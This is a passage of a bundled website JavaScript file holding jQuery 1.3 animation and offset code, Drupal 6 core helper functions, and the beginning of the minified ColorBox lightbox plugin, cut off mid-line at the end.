		var optall = jQuery.speed(speed, easing, callback);

		return this[ optall.queue === false ? "each" : "queue" ](function(){
		
			var opt = jQuery.extend({}, optall), p,
				hidden = this.nodeType == 1 && jQuery(this).is(":hidden"),
				self = this;
	
			for ( p in prop ) {
				if ( prop[p] == "hide" && hidden || prop[p] == "show" && !hidden )
					return opt.complete.call(this);

				if ( ( p == "height" || p == "width" ) && this.style ) {
					// Store display property
					opt.display = jQuery.css(this, "display");

					// Make sure that nothing sneaks out
					opt.overflow = this.style.overflow;
				}
			}

			if ( opt.overflow != null )
				this.style.overflow = "hidden";

			opt.curAnim = jQuery.extend({}, prop);

			jQuery.each( prop, function(name, val){
				var e = new jQuery.fx( self, opt, name );

				if ( /toggle|show|hide/.test(val) )
					e[ val == "toggle" ? hidden ? "show" : "hide" : val ]( prop );
				else {
					var parts = val.toString().match(/^([+-]=)?([\d+-.]+)(.*)$/),
						start = e.cur(true) || 0;

					if ( parts ) {
						var end = parseFloat(parts[2]),
							unit = parts[3] || "px";

						// We need to compute starting value
						if ( unit != "px" ) {
							self.style[ name ] = (end || 1) + unit;
							start = ((end || 1) / e.cur(true)) * start;
							self.style[ name ] = start + unit;
						}

						// If a +=/-= token was provided, we're doing a relative animation
						if ( parts[1] )
							end = ((parts[1] == "-=" ? -1 : 1) * end) + start;

						e.custom( start, end, unit );
					} else
						e.custom( start, val, "" );
				}
			});

			// For JS strict compliance
			return true;
		});
	},

	stop: function(clearQueue, gotoEnd){
		var timers = jQuery.timers;

		if (clearQueue)
			this.queue([]);

		this.each(function(){
			// go in reverse order so anything added to the queue during the loop is ignored
			for ( var i = timers.length - 1; i >= 0; i-- )
				if ( timers[i].elem == this ) {
					if (gotoEnd)
						// force the next step to be the last
						timers[i](true);
					timers.splice(i, 1);
				}
		});

		// start the next in the queue if the last step wasn't forced
		if (!gotoEnd)
			this.dequeue();

		return this;
	}

});

// Generate shortcuts for custom animations
jQuery.each({
	slideDown: genFx("show", 1),
	slideUp: genFx("hide", 1),
	slideToggle: genFx("toggle", 1),
	fadeIn: { opacity: "show" },
	fadeOut: { opacity: "hide" }
}, function( name, props ){
	jQuery.fn[ name ] = function( speed, callback ){
		return this.animate( props, speed, callback );
	};
});

jQuery.extend({

	speed: function(speed, easing, fn) {
		var opt = typeof speed === "object" ? speed : {
			complete: fn || !fn && easing ||
				jQuery.isFunction( speed ) && speed,
			duration: speed,
			easing: fn && easing || easing && !jQuery.isFunction(easing) && easing
		};

		opt.duration = jQuery.fx.off ? 0 : typeof opt.duration === "number" ? opt.duration :
			jQuery.fx.speeds[opt.duration] || jQuery.fx.speeds._default;

		// Queueing
		opt.old = opt.complete;
		opt.complete = function(){
			if ( opt.queue !== false )
				jQuery(this).dequeue();
			if ( jQuery.isFunction( opt.old ) )
				opt.old.call( this );
		};

		return opt;
	},

	easing: {
		linear: function( p, n, firstNum, diff ) {
			return firstNum + diff * p;
		},
		swing: function( p, n, firstNum, diff ) {
			return ((-Math.cos(p*Math.PI)/2) + 0.5) * diff + firstNum;
		}
	},

	timers: [],

	fx: function( elem, options, prop ){
		this.options = options;
		this.elem = elem;
		this.prop = prop;

		if ( !options.orig )
			options.orig = {};
	}

});

jQuery.fx.prototype = {

	// Simple function for setting a style value
	update: function(){
		if ( this.options.step )
			this.options.step.call( this.elem, this.now, this );

		(jQuery.fx.step[this.prop] || jQuery.fx.step._default)( this );

		// Set display property to block for height/width animations
		if ( ( this.prop == "height" || this.prop == "width" ) && this.elem.style )
			this.elem.style.display = "block";
	},

	// Get the current size
	cur: function(force){
		if ( this.elem[this.prop] != null && (!this.elem.style || this.elem.style[this.prop] == null) )
			return this.elem[ this.prop ];

		var r = parseFloat(jQuery.css(this.elem, this.prop, force));
		return r && r > -10000 ? r : parseFloat(jQuery.curCSS(this.elem, this.prop)) || 0;
	},

	// Start an animation from one number to another
	custom: function(from, to, unit){
		this.startTime = now();
		this.start = from;
		this.end = to;
		this.unit = unit || this.unit || "px";
		this.now = this.start;
		this.pos = this.state = 0;

		var self = this;
		function t(gotoEnd){
			return self.step(gotoEnd);
		}

		t.elem = this.elem;

		if ( t() && jQuery.timers.push(t) && !timerId ) {
			timerId = setInterval(function(){
				var timers = jQuery.timers;

				for ( var i = 0; i < timers.length; i++ )
					if ( !timers[i]() )
						timers.splice(i--, 1);

				if ( !timers.length ) {
					clearInterval( timerId );
					timerId = undefined;
				}
			}, 13);
		}
	},

	// Simple 'show' function
	show: function(){
		// Remember where we started, so that we can go back to it later
		this.options.orig[this.prop] = jQuery.attr( this.elem.style, this.prop );
		this.options.show = true;

		// Begin the animation
		// Make sure that we start at a small width/height to avoid any
		// flash of content
		this.custom(this.prop == "width" || this.prop == "height" ? 1 : 0, this.cur());

		// Start by showing the element
		jQuery(this.elem).show();
	},

	// Simple 'hide' function
	hide: function(){
		// Remember where we started, so that we can go back to it later
		this.options.orig[this.prop] = jQuery.attr( this.elem.style, this.prop );
		this.options.hide = true;

		// Begin the animation
		this.custom(this.cur(), 0);
	},

	// Each step of an animation
	step: function(gotoEnd){
		var t = now();

		if ( gotoEnd || t >= this.options.duration + this.startTime ) {
			this.now = this.end;
			this.pos = this.state = 1;
			this.update();

			this.options.curAnim[ this.prop ] = true;

			var done = true;
			for ( var i in this.options.curAnim )
				if ( this.options.curAnim[i] !== true )
					done = false;

			if ( done ) {
				if ( this.options.display != null ) {
					// Reset the overflow
					this.elem.style.overflow = this.options.overflow;

					// Reset the display
					this.elem.style.display = this.options.display;
					if ( jQuery.css(this.elem, "display") == "none" )
						this.elem.style.display = "block";
				}

				// Hide the element if the "hide" operation was done
				if ( this.options.hide )
					jQuery(this.elem).hide();

				// Reset the properties, if the item has been hidden or shown
				if ( this.options.hide || this.options.show )
					for ( var p in this.options.curAnim )
						jQuery.attr(this.elem.style, p, this.options.orig[p]);
					
				// Execute the complete function
				this.options.complete.call( this.elem );
			}

			return false;
		} else {
			var n = t - this.startTime;
			this.state = n / this.options.duration;

			// Perform the easing function, defaults to swing
			this.pos = jQuery.easing[this.options.easing || (jQuery.easing.swing ? "swing" : "linear")](this.state, n, 0, 1, this.options.duration);
			this.now = this.start + ((this.end - this.start) * this.pos);

			// Perform the next step of the animation
			this.update();
		}

		return true;
	}

};

jQuery.extend( jQuery.fx, {
	speeds:{
		slow: 600,
 		fast: 200,
 		// Default speed
 		_default: 400
	},
	step: {

		opacity: function(fx){
			jQuery.attr(fx.elem.style, "opacity", fx.now);
		},

		_default: function(fx){
			if ( fx.elem.style && fx.elem.style[ fx.prop ] != null )
				fx.elem.style[ fx.prop ] = fx.now + fx.unit;
			else
				fx.elem[ fx.prop ] = fx.now;
		}
	}
});
if ( document.documentElement["getBoundingClientRect"] )
	jQuery.fn.offset = function() {
		if ( !this[0] ) return { top: 0, left: 0 };
		if ( this[0] === this[0].ownerDocument.body ) return jQuery.offset.bodyOffset( this[0] );
		var box  = this[0].getBoundingClientRect(), doc = this[0].ownerDocument, body = doc.body, docElem = doc.documentElement,
			clientTop = docElem.clientTop || body.clientTop || 0, clientLeft = docElem.clientLeft || body.clientLeft || 0,
			top  = box.top  + (self.pageYOffset || jQuery.boxModel && docElem.scrollTop  || body.scrollTop ) - clientTop,
			left = box.left + (self.pageXOffset || jQuery.boxModel && docElem.scrollLeft || body.scrollLeft) - clientLeft;
		return { top: top, left: left };
	};
else 
	jQuery.fn.offset = function() {
		if ( !this[0] ) return { top: 0, left: 0 };
		if ( this[0] === this[0].ownerDocument.body ) return jQuery.offset.bodyOffset( this[0] );
		jQuery.offset.initialized || jQuery.offset.initialize();

		var elem = this[0], offsetParent = elem.offsetParent, prevOffsetParent = elem,
			doc = elem.ownerDocument, computedStyle, docElem = doc.documentElement,
			body = doc.body, defaultView = doc.defaultView,
			prevComputedStyle = defaultView.getComputedStyle(elem, null),
			top = elem.offsetTop, left = elem.offsetLeft;

		while ( (elem = elem.parentNode) && elem !== body && elem !== docElem ) {
			computedStyle = defaultView.getComputedStyle(elem, null);
			top -= elem.scrollTop, left -= elem.scrollLeft;
			if ( elem === offsetParent ) {
				top += elem.offsetTop, left += elem.offsetLeft;
				if ( jQuery.offset.doesNotAddBorder && !(jQuery.offset.doesAddBorderForTableAndCells && /^t(able|d|h)$/i.test(elem.tagName)) )
					top  += parseInt( computedStyle.borderTopWidth,  10) || 0,
					left += parseInt( computedStyle.borderLeftWidth, 10) || 0;
				prevOffsetParent = offsetParent, offsetParent = elem.offsetParent;
			}
			if ( jQuery.offset.subtractsBorderForOverflowNotVisible && computedStyle.overflow !== "visible" )
				top  += parseInt( computedStyle.borderTopWidth,  10) || 0,
				left += parseInt( computedStyle.borderLeftWidth, 10) || 0;
			prevComputedStyle = computedStyle;
		}

		if ( prevComputedStyle.position === "relative" || prevComputedStyle.position === "static" )
			top  += body.offsetTop,
			left += body.offsetLeft;

		if ( prevComputedStyle.position === "fixed" )
			top  += Math.max(docElem.scrollTop, body.scrollTop),
			left += Math.max(docElem.scrollLeft, body.scrollLeft);

		return { top: top, left: left };
	};

jQuery.offset = {
	initialize: function() {
		if ( this.initialized ) return;
		var body = document.body, container = document.createElement('div'), innerDiv, checkDiv, table, td, rules, prop, bodyMarginTop = body.style.marginTop,
			html = '<div style="position:absolute;top:0;left:0;margin:0;border:5px solid #000;padding:0;width:1px;height:1px;"><div></div></div><table style="position:absolute;top:0;left:0;margin:0;border:5px solid #000;padding:0;width:1px;height:1px;" cellpadding="0" cellspacing="0"><tr><td></td></tr></table>';

		rules = { position: 'absolute', top: 0, left: 0, margin: 0, border: 0, width: '1px', height: '1px', visibility: 'hidden' };
		for ( prop in rules ) container.style[prop] = rules[prop];

		container.innerHTML = html;
		body.insertBefore(container, body.firstChild);
		innerDiv = container.firstChild, checkDiv = innerDiv.firstChild, td = innerDiv.nextSibling.firstChild.firstChild;

		this.doesNotAddBorder = (checkDiv.offsetTop !== 5);
		this.doesAddBorderForTableAndCells = (td.offsetTop === 5);

		innerDiv.style.overflow = 'hidden', innerDiv.style.position = 'relative';
		this.subtractsBorderForOverflowNotVisible = (checkDiv.offsetTop === -5);

		body.style.marginTop = '1px';
		this.doesNotIncludeMarginInBodyOffset = (body.offsetTop === 0);
		body.style.marginTop = bodyMarginTop;

		body.removeChild(container);
		this.initialized = true;
	},

	bodyOffset: function(body) {
		jQuery.offset.initialized || jQuery.offset.initialize();
		var top = body.offsetTop, left = body.offsetLeft;
		if ( jQuery.offset.doesNotIncludeMarginInBodyOffset )
			top  += parseInt( jQuery.curCSS(body, 'marginTop',  true), 10 ) || 0,
			left += parseInt( jQuery.curCSS(body, 'marginLeft', true), 10 ) || 0;
		return { top: top, left: left };
	}
};


jQuery.fn.extend({
	position: function() {
		var left = 0, top = 0, results;

		if ( this[0] ) {
			// Get *real* offsetParent
			var offsetParent = this.offsetParent(),

			// Get correct offsets
			offset       = this.offset(),
			parentOffset = /^body|html$/i.test(offsetParent[0].tagName) ? { top: 0, left: 0 } : offsetParent.offset();

			// Subtract element margins
			// note: when an element has margin: auto the offsetLeft and marginLeft 
			// are the same in Safari causing offset.left to incorrectly be 0
			offset.top  -= num( this, 'marginTop'  );
			offset.left -= num( this, 'marginLeft' );

			// Add offsetParent borders
			parentOffset.top  += num( offsetParent, 'borderTopWidth'  );
			parentOffset.left += num( offsetParent, 'borderLeftWidth' );

			// Subtract the two offsets
			results = {
				top:  offset.top  - parentOffset.top,
				left: offset.left - parentOffset.left
			};
		}

		return results;
	},

	offsetParent: function() {
		var offsetParent = this[0].offsetParent || document.body;
		while ( offsetParent && (!/^body|html$/i.test(offsetParent.tagName) && jQuery.css(offsetParent, 'position') == 'static') )
			offsetParent = offsetParent.offsetParent;
		return jQuery(offsetParent);
	}
});


// Create scrollLeft and scrollTop methods
jQuery.each( ['Left', 'Top'], function(i, name) {
	var method = 'scroll' + name;
	
	jQuery.fn[ method ] = function(val) {
		if (!this[0]) return null;

		return val !== undefined ?

			// Set the scroll offset
			this.each(function() {
				this == window || this == document ?
					window.scrollTo(
						!i ? val : jQuery(window).scrollLeft(),
						 i ? val : jQuery(window).scrollTop()
					) :
					this[ method ] = val;
			}) :

			// Return the scroll offset
			this[0] == window || this[0] == document ?
				self[ i ? 'pageYOffset' : 'pageXOffset' ] ||
					jQuery.boxModel && document.documentElement[ method ] ||
					document.body[ method ] :
				this[0][ method ];
	};
});
// Create innerHeight, innerWidth, outerHeight and outerWidth methods
jQuery.each([ "Height", "Width" ], function(i, name){

	var tl = i ? "Left"  : "Top",  // top or left
		br = i ? "Right" : "Bottom", // bottom or right
		lower = name.toLowerCase();

	// innerHeight and innerWidth
	jQuery.fn["inner" + name] = function(){
		return this[0] ?
			jQuery.css( this[0], lower, false, "padding" ) :
			null;
	};

	// outerHeight and outerWidth
	jQuery.fn["outer" + name] = function(margin) {
		return this[0] ?
			jQuery.css( this[0], lower, false, margin ? "margin" : "border" ) :
			null;
	};
	
	var type = name.toLowerCase();

	jQuery.fn[ type ] = function( size ) {
		// Get window width or height
		return this[0] == window ?
			// Everyone else use document.documentElement or document.body depending on Quirks vs Standards mode
			document.compatMode == "CSS1Compat" && document.documentElement[ "client" + name ] ||
			document.body[ "client" + name ] :

			// Get document width or height
			this[0] == document ?
				// Either scroll[Width/Height] or offset[Width/Height], whichever is greater
				Math.max(
					document.documentElement["client" + name],
					document.body["scroll" + name], document.documentElement["scroll" + name],
					document.body["offset" + name], document.documentElement["offset" + name]
				) :

				// Get or set width or height on the element
				size === undefined ?
					// Get width or height on the element
					(this.length ? jQuery.css( this[0], type ) : null) :

					// Set the width or height on the element (default to pixels if value is unitless)
					this.css( type, typeof size === "string" ? size : size + "px" );
	};

});
})();
;

var Drupal = Drupal || { 'settings': {}, 'behaviors': {}, 'themes': {}, 'locale': {} };

/**
 * Set the variable that indicates if JavaScript behaviors should be applied
 */
Drupal.jsEnabled = document.getElementsByTagName && document.createElement && document.createTextNode && document.documentElement && document.getElementById;

/**
 * Attach all registered behaviors to a page element.
 *
 * Behaviors are event-triggered actions that attach to page elements, enhancing
 * default non-Javascript UIs. Behaviors are registered in the Drupal.behaviors
 * object as follows:
 * @code
 *    Drupal.behaviors.behaviorName = function () {
 *      ...
 *    };
 * @endcode
 *
 * Drupal.attachBehaviors is added below to the jQuery ready event and so
 * runs on initial page load. Developers implementing AHAH/AJAX in their
 * solutions should also call this function after new page content has been
 * loaded, feeding in an element to be processed, in order to attach all
 * behaviors to the new content.
 *
 * Behaviors should use a class in the form behaviorName-processed to ensure
 * the behavior is attached only once to a given element. (Doing so enables
 * the reprocessing of given elements, which may be needed on occasion despite
 * the ability to limit behavior attachment to a particular element.)
 *
 * @param context
 *   An element to attach behaviors to. If none is given, the document element
 *   is used.
 */
Drupal.attachBehaviors = function(context) {
  context = context || document;
  if (Drupal.jsEnabled) {
    // Execute all of them.
    jQuery.each(Drupal.behaviors, function() {
      this(context);
    });
  }
};

/**
 * Encode special characters in a plain-text string for display as HTML.
 */
Drupal.checkPlain = function(str) {
  str = String(str);
  var replace = { '&': '&amp;', '"': '&quot;', '<': '&lt;', '>': '&gt;' };
  for (var character in replace) {
    var regex = new RegExp(character, 'g');
    str = str.replace(regex, replace[character]);
  }
  return str;
};

/**
 * Translate strings to the page language or a given language.
 *
 * See the documentation of the server-side t() function for further details.
 *
 * @param str
 *   A string containing the English string to translate.
 * @param args
 *   An object of replacements pairs to make after translation. Incidences
 *   of any key in this array are replaced with the corresponding value.
 *   Based on the first character of the key, the value is escaped and/or themed:
 *    - !variable: inserted as is
 *    - @variable: escape plain text to HTML (Drupal.checkPlain)
 *    - %variable: escape text and theme as a placeholder for user-submitted
 *      content (checkPlain + Drupal.theme('placeholder'))
 * @return
 *   The translated string.
 */
Drupal.t = function(str, args) {
  // Fetch the localized version of the string.
  if (Drupal.locale.strings && Drupal.locale.strings[str]) {
    str = Drupal.locale.strings[str];
  }

  if (args) {
    // Transform arguments before inserting them
    for (var key in args) {
      switch (key.charAt(0)) {
        // Escaped only
        case '@':
          args[key] = Drupal.checkPlain(args[key]);
        break;
        // Pass-through
        case '!':
          break;
        // Escaped and placeholder
        case '%':
        default:
          args[key] = Drupal.theme('placeholder', args[key]);
          break;
      }
      str = str.replace(key, args[key]);
    }
  }
  return str;
};

/**
 * Format a string containing a count of items.
 *
 * This function ensures that the string is pluralized correctly. Since Drupal.t() is
 * called by this function, make sure not to pass already-localized strings to it.
 *
 * See the documentation of the server-side format_plural() function for further details.
 *
 * @param count
 *   The item count to display.
 * @param singular
 *   The string for the singular case. Please make sure it is clear this is
 *   singular, to ease translation (e.g. use "1 new comment" instead of "1 new").
 *   Do not use @count in the singular string.
 * @param plural
 *   The string for the plural case. Please make sure it is clear this is plural,
 *   to ease translation. Use @count in place of the item count, as in "@count
 *   new comments".
 * @param args
 *   An object of replacements pairs to make after translation. Incidences
 *   of any key in this array are replaced with the corresponding value.
 *   Based on the first character of the key, the value is escaped and/or themed:
 *    - !variable: inserted as is
 *    - @variable: escape plain text to HTML (Drupal.checkPlain)
 *    - %variable: escape text and theme as a placeholder for user-submitted
 *      content (checkPlain + Drupal.theme('placeholder'))
 *   Note that you do not need to include @count in this array.
 *   This replacement is done automatically for the plural case.
 * @return
 *   A translated string.
 */
Drupal.formatPlural = function(count, singular, plural, args) {
  var args = args || {};
  args['@count'] = count;
  // Determine the index of the plural form.
  var index = Drupal.locale.pluralFormula ? Drupal.locale.pluralFormula(args['@count']) : ((args['@count'] == 1) ? 0 : 1);

  if (index == 0) {
    return Drupal.t(singular, args);
  }
  else if (index == 1) {
    return Drupal.t(plural, args);
  }
  else {
    args['@count['+ index +']'] = args['@count'];
    delete args['@count'];
    return Drupal.t(plural.replace('@count', '@count['+ index +']'));
  }
};

/**
 * Generate the themed representation of a Drupal object.
 *
 * All requests for themed output must go through this function. It examines
 * the request and routes it to the appropriate theme function. If the current
 * theme does not provide an override function, the generic theme function is
 * called.
 *
 * For example, to retrieve the HTML that is output by theme_placeholder(text),
 * call Drupal.theme('placeholder', text).
 *
 * @param func
 *   The name of the theme function to call.
 * @param ...
 *   Additional arguments to pass along to the theme function.
 * @return
 *   Any data the theme function returns. This could be a plain HTML string,
 *   but also a complex object.
 */
Drupal.theme = function(func) {
  for (var i = 1, args = []; i < arguments.length; i++) {
    args.push(arguments[i]);
  }

  return (Drupal.theme[func] || Drupal.theme.prototype[func]).apply(this, args);
};

/**
 * Parse a JSON response.
 *
 * The result is either the JSON object, or an object with 'status' 0 and 'data' an error message.
 */
Drupal.parseJson = function (data) {
  if ((data.substring(0, 1) != '{') && (data.substring(0, 1) != '[')) {
    return { status: 0, data: data.length ? data : Drupal.t('Unspecified error') };
  }
  return eval('(' + data + ');');
};

/**
 * Freeze the current body height (as minimum height). Used to prevent
 * unnecessary upwards scrolling when doing DOM manipulations.
 */
Drupal.freezeHeight = function () {
  Drupal.unfreezeHeight();
  var div = document.createElement('div');
  $(div).css({
    position: 'absolute',
    top: '0px',
    left: '0px',
    width: '1px',
    height: $('body').css('height')
  }).attr('id', 'freeze-height');
  $('body').append(div);
};

/**
 * Unfreeze the body height
 */
Drupal.unfreezeHeight = function () {
  $('#freeze-height').remove();
};

/**
 * Wrapper around encodeURIComponent() which avoids Apache quirks (equivalent of
 * drupal_urlencode() in PHP). This function should only be used on paths, not
 * on query string arguments.
 */
Drupal.encodeURIComponent = function (item, uri) {
  uri = uri || location.href;
  item = encodeURIComponent(item).replace(/%2F/g, '/');
  return (uri.indexOf('?q=') != -1) ? item : item.replace(/%26/g, '%2526').replace(/%23/g, '%2523').replace(/\/\//g, '/%252F');
};

/**
 * Get the text selection in a textarea.
 */
Drupal.getSelection = function (element) {
  if (typeof(element.selectionStart) != 'number' && document.selection) {
    // The current selection
    var range1 = document.selection.createRange();
    var range2 = range1.duplicate();
    // Select all text.
    range2.moveToElementText(element);
    // Now move 'dummy' end point to end point of original range.
    range2.setEndPoint('EndToEnd', range1);
    // Now we can calculate start and end points.
    var start = range2.text.length - range1.text.length;
    var end = start + range1.text.length;
    return { 'start': start, 'end': end };
  }
  return { 'start': element.selectionStart, 'end': element.selectionEnd };
};

/**
 * Build an error message from ahah response.
 */
Drupal.ahahError = function(xmlhttp, uri) {
  if (xmlhttp.status == 200) {
    if (jQuery.trim($(xmlhttp.responseText).text())) {
      var message = Drupal.t("An error occurred. \n@uri\n@text", {'@uri': uri, '@text': xmlhttp.responseText });
    }
    else {
      var message = Drupal.t("An error occurred. \n@uri\n(no information available).", {'@uri': uri, '@text': xmlhttp.responseText });
    }
  }
  else {
    var message = Drupal.t("An HTTP error @status occurred. \n@uri", {'@uri': uri, '@status': xmlhttp.status });
  }
  return message;
}

// Global Killswitch on the <html> element
if (Drupal.jsEnabled) {
  // Global Killswitch on the <html> element
  $(document.documentElement).addClass('js');
  // 'js enabled' cookie
  document.cookie = 'has_js=1; path=/';
  // Attach all behaviors.
  $(document).ready(function() {
    Drupal.attachBehaviors(this);
  });
}

/**
 * The default themes.
 */
Drupal.theme.prototype = {

  /**
   * Formats text for emphasized display in a placeholder inside a sentence.
   *
   * @param str
   *   The text to format (plain-text).
   * @return
   *   The formatted text (html).
   */
  placeholder: function(str) {
    return '<em>' + Drupal.checkPlain(str) + '</em>';
  }
};
;
// ColorBox v1.3.17.2 - a full featured, light-weight, customizable lightbox based on jQuery 1.3+
// Copyright (c) 2011 Jack Moore - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function(a,b,c){function bc(b){if(!U){P=b,_(),y=a(P),Q=0,K.rel!=="nofollow"&&(y=a("."+g).filter(function(){var b=a.data(this,e).rel||this.rel;return b===K.rel}),Q=y.index(P),Q===-1&&(y=y.add(P),Q=y.length-1));if(!S){S=T=!0,r.show();if(K.returnFocus)try{P.blur(),a(P).one(l,function(){try{this.focus()}catch(a){}})}catch(c){}q.css({opacity:+K.opacity,cursor:K.overlayClose?"pointer":"auto"}).show(),K.w=Z(K.initialWidth,"x"),K.h=Z(K.initialHeight,"y"),X.position(),o&&z.bind("resize."+p+" scroll."+p,function(){q.css({width:z.width(),height:z.height(),top:z.scrollTop(),left:z.scrollLeft()})}).trigger("resize."+p),ba(h,K.onOpen),J.add(D).hide(),I.html(K.close).show()}X.load(!0)}}function bb(){var a,b=f+"Slideshow_",c="click."+f,d,e,g;K.slideshow&&y[1]?(d=function(){F.text(K.slideshowStop).unbind(c).bind(j,function(){if(Q<y.length-1||K.loop)a=setTimeout(X.next,K.slideshowSpeed)}).bind(i,function(){clearTimeout(a)}).one(c+" "+k,e),r.removeClass(b+"off").addClass(b+"on"),a=setTimeout(X.next,K.slideshowSpeed)},e=function(){clearTimeout(a),F.text(K.slideshowStart).unbind([j,i,k,c].join(" ")).one(c,d),r.removeClass(b+"on").addClass(b+"off")},K.slideshowAuto?d():e()):r.removeClass(b+"off "+b+"on")}function ba(b,c){c&&c.call(P),a.event.trigger(b)}function _(b){K=a.extend({},a.data(P,e));for(b in K)a.isFunction(K[b])&&b.substring(0,2)!=="on"&&(K[b]=K[b].call(P));K.rel=K.rel||P.rel||"nofollow",K.href=K.href||a(P).attr("href"),K.title=K.title||P.title,typeof K.href=="string"&&(K.href=a.trim(K.href))}function $(a){return K.photo||/\.(gif|png|jpg|jpeg|bmp)(?:\?([^#]*))?(?:#(\.*))?$/i.test(a)}function Z(a,b){return Math.round((/%/.test(a)?(b==="x"?z.width():z.height())/100:1)*parseInt(a,10))}function Y(c,d,e){e=b.createElement("div"),c&&(e.id=f+c),e.style.cssText=d||"";return a(e)}var d={transition:"elastic",speed:300,width:!1,initialWidth:"600",innerWidth:!1,maxWidth:!1,height:!1,initialHeight:"450",innerHeight:!1,maxHeight:!1,scalePhotos:!0,scrolling:!0,inline:!1,html:!1,iframe:!1,fastIframe:!0,photo:!1,href:!1,title:!1,rel:!1,opacity:.9,preloading:!0,current:"image {current} of {total}",previous:"previous",next:"next",close:"close",open:!1,returnFocus:!0,loop:!0,slideshow:!1,slideshowAuto:!0,slideshowSpeed:2500,slideshowStart:"start slideshow",slideshowStop:"stop slideshow",onOpen:!1,onLoad:!1,onComplete:!1,onCleanup:!1,onClosed:!1,overlayClose:!0,escKey:!0,arrowKey:!0,top:!1,bottom:!1,left:!1,right:!1,fixed:!1,data:!1},e="colorbox",f="cbox",g=f+"Element",h=f+"_open",i=f+"_load",j=f+"_complete",k=f+"_cleanup",l=f+"_closed",m=f+"_purge",n=a.browser.msie&&!a.support.opacity,o=n&&a.browser.version<7,p=f+"_IE6",q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X;X=a.fn[e]=a[e]=function(b,c){var f=this;b=b||{};if(!f[0]){if(f.selector)return f;f=a("<a/>"),b.open=!0}c&&(b.onComplete=c),f.each(function(){a.data(this,e,a.extend({},a.data(this,e)||d,b)),a(this).addClass(g)}),(a.isFunction(b.open)&&b.open.call(f)||b.open)&&bc(f[0]);return f},X.init=function(){z=a(c),r=Y().attr({id:e,"class":n?f+(o?"IE6":"IE"):""}),q=Y("Overlay",o?"position:absolute":"").hide(),s=Y("Wrapper"),t=Y("Content").append(A=Y("LoadedContent","width:0; height:0; overflow:hidden"),C=Y("LoadingOverlay").add(Y("LoadingGraphic")),D=Y("Title"),E=Y("Current"),G=Y("Next"),H=Y("Previous"),F=Y("Slideshow").bind(h,bb),I=Y("Close")),s.append(Y().append(Y("TopLeft"),u=Y("TopCenter"),Y("TopRight")),Y(!1,"clear:left").append(v=Y("MiddleLeft"),t,w=Y("MiddleRight")),Y(!1,"clear:left").append(Y("BottomLeft"),x=Y("BottomCenter"),Y("BottomRight"))).children().children().css({"float":"left"}),B=Y(!1,"position:absolute; width:9999px; visibility:hidden; display:none"),a("body").prepend(q,r.append(s,B)),t.children().hover(function(){a(this).addClass("hover")},function(){a(this).removeClass("hover")}).addClass("hover"),L=u.height()+x.height()+t.outerHeight(!0)-t.height(),M=v.width()+w.width()+t.outerWidth(!0)-t.width(),N=A.outerHeight(!0),O=A.outerWidth(!0),r.css({"padding-bottom":L,"padding-right":M}).hide(),G.click(function(){X.next()}),H.click(function(){X.prev()}),I.click(function(){X.close()}),J=G.add(H).add(E).add(F),t.children().removeClass("hover"),q.click(function(){K.overlayClose&&X.close()}),a(b).bind("keydown."+f,function(a){var b=a.keyCode;S&&K.escKey&&b===27&&(a.preventDefault(),X.close()),S&&K.arrowKey&&y[1]&&(b===37?(a.preventDefault(),H.click()):b===39&&(a.preventDefault(),G.click()))})},X.remove=function(){r.add(q).remove(),a("."+g).removeData(e).removeClass(g)},X.position=function(a,c){function g(a){u[0].style.width=x[0].style.width=t[0].style.width=a.style.width,C[0].style.height=C[1].style.height=t[0].style.height=v[0].style.height=w[0].style.height=a.style.height}var d=0,e=0;z.unbind("resize."+f),r.hide(),K.fixed&&!o?r.css({position:"fixed"}):(d=z.scrollTop(),e=z.scrollLeft(),r.css({position:"absolute"})),K.right!==!1?e+=Math.max(z.width()-K.w-O-M-Z(K.right,"x"),0):K.left!==!1?e+=Z(K.left,"x"):e+=Math.round(Math.max(z.width()-K.w-O-M,0)/2),K.bottom!==!1?d+=Math.max(b.documentElement.clientHeight-K.h-N-L-Z(K.bottom,"y"),0):K.top!==!1?d+=Z(K.top,"y"):d+=Math.round(Math.max(b.documentElement.clientHeight-K.h-N-L,0)/2),r.show(),a=r.width()===K.w+O&&r.height()===K.h+N?0:a||0,s[0].style.width=s[0].style.height="9999px",r.dequeue().animate({width:K.w+O,height:K.h+N,top:d,left:e},{duration:a,complete:function(){g(this),T=!1,s[0].style.width=K.w+O+M+"px",s[0].style.height=K.h+N+L+"px",c&&c(),setTimeout(function(){z.bind("resize."+f,X.position)},1)},step:function(){g(this)}})},X.resize=function(a){if(S){a=a||{},a.width&&(K.w=Z(a.width,"x")-O-M),a.innerWidth&&(K.w=Z(a.innerWidth,"x")),A.css({width:K.w}),a.height&&(K.h=Z(a.height,"y")-N-L),a.innerHeight&&(K.h=Z(a.innerHeight,"y"));if(!a.innerHeight&&!a.height){var b=A.wrapInner("<div style='overflow:auto'></div>").children();K.h=b.height(),b.replaceWith(b.children())}A.css({height:K.h}),X.position(K.transition==="none"?0:K.speed)}},X.prep=function(b){function h(){K.h=K.h||A.height(),K.h=K.mh&&K.mh<K.h?K.mh:K.h;return K.h}function g(){K.w=K.w||A.width(),K.w=K.mw&&K.mw<K.w?K.mw:K.w;return K.w}if(!!S){var c,d=K.transition==="none"?0:K.speed;A.remove(),A=Y("LoadedContent").append(b),A.hide().appendTo(B.show()).css({width:g(),overflow:K.scrolling?"auto":"hidden"}).css({height:h()}).prependTo(t),B.hide(),a(R).css({"float":"none"}),o&&a("select").not(r.find("select")).filter(function(){return this.style.visibility!=="hidden"}).css({visibility:"hidden"}).one(k,function(){this.style.visibility="inherit"}),c=function(){function o(){n&&r[0].style.removeAttribute("filter")}var b,c,g,h,i=y.length,k,l;!S||(l=function(){clearTimeout(W),C.hide(),ba(j,K.onComplete)},n&&R&&A.fadeIn(100),D.html(K.title).add(A).show(),i>1?(typeof K.current=="string"&&E.html(K.current.replace("{current}",Q+1).replace("{total}",i)).show(),G[K.loop||Q<i-1?"show":"hide"]().html(K.next),H[K.loop||Q?"show":"hide"]().html(K.previous),b=Q?y[Q-1]:y[i-1],g=Q<i-1?y[Q+1]:y[0],K.slideshow&&F.show(),K.preloading&&(h=a.data(g,e).href||g.href,c=a.data(b,e).href||b.href,h=a.isFunction(h)?h.call(g):h,c=a.isFunction(c)?c.call(b):c,$(h)&&(a("<img/>")[0].src=h),$(c)&&(a("<img/>")[0].src=c))):J.hide(),K.iframe?(k=a("<iframe/>").addClass(f+"Iframe")[0],K.fastIframe?l():a(k).one("load",l),k.name=f+ +(new 